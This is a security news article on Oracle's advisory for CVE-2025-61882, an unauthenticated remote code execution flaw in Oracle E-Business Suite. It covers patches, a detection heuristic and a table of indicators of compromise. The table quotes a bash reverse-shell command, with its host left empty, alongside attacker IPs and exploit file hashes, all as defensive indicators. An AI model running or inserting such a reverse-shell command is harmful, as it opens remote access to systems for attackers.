Redazione RHC : 5 October 2025 21:29
Oracle has published a security advisory regarding a critical vulnerability identified as CVE-2025-61882 in the Oracle E-Business Suite . The flaw can be exploited remotely without authentication , potentially allowing malicious code to be executed on affected systems.
The company recommends that its customers immediately apply the updates outlined in the advisory. Oracle emphasizes the importance of maintaining actively supported product versions and installing all critical security patches promptly. In particular, updating critical patches released in October 2023 is a prerequisite for implementing new fixes.
To support immediate detection and containment of potential attacks, the alert includes a risk matrix with indicators of compromise , such as suspicious IP addresses, commands, and files associated with known exploits.
The vulnerability specifically affects Oracle E-Business Suite versions 12.2.3 through 12.2.14 . The official documentation, available through the links provided by Oracle, contains detailed information about the patches and how to install them.affected products and versions Patch Availability Document Oracle E-Business Suite, versions 12.2.3–12.2.14 Oracle E-Business Suite
Patches provided through the Security Alert program are available only for versions covered by Premier Support or Extended Support under Oracle’s Lifetime Support Policy.
Versions not included in these programs are not tested for reported vulnerabilities, even though they may still be affected. For this reason, Oracle recommends upgrading to supported versions to ensure protection and compatibility with security patches.
CVE-2025-61882 affects Oracle E-Business Suite and is remotely exploitable without authentication, potentially resulting in remote code execution if successfully exploited.
A public detection method has been published on GitHub that helps identify potentially outdated instances. The method flags an instance as suspicious when the page returns the string “E-Business Suite Home Page” and the HTTP Last-Modified header reports a date before October 4, 2025 (Unix timestamp 1759602752 ).
This approach is described as a detection tool—not an attack vector —and should be used for verification and defense purposes only. To mitigate the risk, Oracle recommends applying the patches outlined in the security advisory and updating to supported versions.
Below are indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, investigation, and containment.
| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | Intellectual property | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | Intellectual property | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp//0>&1 | Command | Establish an outgoing TCP connection on a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Redazione